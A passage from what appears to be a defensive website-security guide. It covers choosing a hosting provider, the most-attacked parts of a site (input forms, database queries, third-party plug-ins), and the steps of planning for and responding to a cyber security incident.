Shared hosting is not recommended in cases when the site consists of active content that changes relatively often and when the number of visitors varies. Dedicated hosting and cloud hosting are better solutions, but their price is a bit higher. Finally, the choice of option depends on the needs of the organisation.

Technical support is one of the most important segments of the hosting service, because in case something goes wrong, this service is a contact point that must be fully cooperative to solve the problem as soon as possible. It is advisable to choose a company whose technical support service is operational 24/7.

Although all the content and traffic on the internet is practically virtual, good old machines are still the basis of it all. That is why it is important to check what kind of hardware the hosting company is using.

Finally, the technical specifications of the hosting package are the most important feature and it is desirable that they are scalable, i.e. that they can be adapted and upgraded in accordance with the changing needs of the organisation.

Good hosting also implies decentralisation. It is not recommended that the same server used for hosting the site is also mail or data server. The web server must be accessible from the public internet, while access to the data centre from the public internet would be a serious security issue. If there is a need to access the data stored in the data centre remotely, it is best to use VPN services.

Critical points

Each platform has several points that are the most common targets of attack. If the web developer pays attention to these zones when creating the site, it will significantly reduce the risks to the content and provide unhindered access to the site:

  • Contact forms, surveys and other parts of the site where readers can enter data are the highest-risk areas, because they accept attacker-controlled input that the site then processes. If a contact form is not necessary for the operation of the site, it is wise to do without it, while surveys can be limited to one entry per IP address. Interaction with readers can instead be developed in a separate space that is not directly connected to the site itself;
  • The database is also one of the riskier parts of the site. If the code that queries it is vulnerable, crafted queries can extract data or tie the database up so that readers cannot reach the site. The solution is to strictly validate every value before it reaches the database, use parameterised queries, and refuse illegitimate queries whether they arrive via the URL or otherwise;
  • Third-party software installed to make the site more attractive is often an additional risk. It usually takes the form of themes and plug-ins that improve the look and functionality of the site, but it can contain malicious code or security flaws that compromise the site's integrity. Use only software from credible, actively maintained sources, obtained from the platform's official repository, and keep it updated.

General steps

7 general steps that can be implemented in the case of a cyber security incident:

1. Establishing an IR team: Your incident response plan starts with putting together a group of experts. The team should include these positions:

- Technical Lead: responsible for technical analysis and resolution of incidents.

- Legal and Compliance Lead: responsible for ensuring that incident response activities comply with legal and regulatory requirements.

- Communications Lead: responsible for communication with internal and external stakeholders.

It is also recommended to have external IT support on call.

2. Conduct threat analysis: Your IR team should look for various clues (for example unusual traffic or requests) in order to analyse potential threats. This means understanding what kinds of attacks your organisation might face and how they could harm you.

3. Outline quick response guidance: In the heat of the moment, your team needs a playbook to follow. This guidance tells them what to do as soon as they spot trouble. It's like having an emergency checklist, so everyone knows exactly what steps to take.

4. Develop procedures for external communication: When an incident happens, you might need to talk to the police, customers, or other organisations. You need clear procedures for who talks to whom and what to say. Think of this step as setting up a secure channel for communication to get help and share information.

5. Train employees: Your employees need to be educated on security practices. They should know how to spot suspicious activity and understand their role in the incident response plan.

6. Test IR plan: Your IR plan should be tested regularly through drills and simulations. This helps your team refine their skills and identify any weaknesses in your plan.

7. Learn: After each incident or test, take time to learn from the experience. What worked well? What could be improved? Continuous improvement is the key to staying ahead of cyber threats.

So, adequately responding to an incident involves assembling a capable team, understanding potential threats, preparing for quick action, and constantly sharpening your skills to keep your organisation safe from digital threats.

Incident response process

Responding effectively to cyber incidents contains these six steps:

1. Preparation: This is where you get ready for any potential incident. You identify what resources you have, like people, tools, and knowledge. It's like putting together a team of superheroes and giving them the equipment they need to protect your organisation.

2. Identification: In this step, you're like a detective trying to spot signs of trouble. You keep an eye out for anything unusual or suspicious. It's a bit like noticing smoke before a fire starts, so you can act quickly.

3. Containment: When you've identified a problem, you need to stop it from getting worse. Imagine a leak in a boat - containment is like plugging that hole to keep water from pouring in.

4. Eradication: After containment, you dig deeper to find the root cause of the problem and eliminate it. It's like getting rid of the pesky weeds in your garden so they don't grow back.

5. Recovery: Once the threat is gone, you start fixing things and getting back to normal. It's like repairing any damage done and getting the boat back in working order so you can sail smoothly.

6. Lessons Learned: Finally, you take a moment to reflect on what happened. What can you do better next time? It's like learning from your mistakes, so you're even better prepared for the future.

So, these six steps are like a roadmap for handling incidents. They help you prepare, respond, and recover from unexpected events, making sure your organisation stays safe.
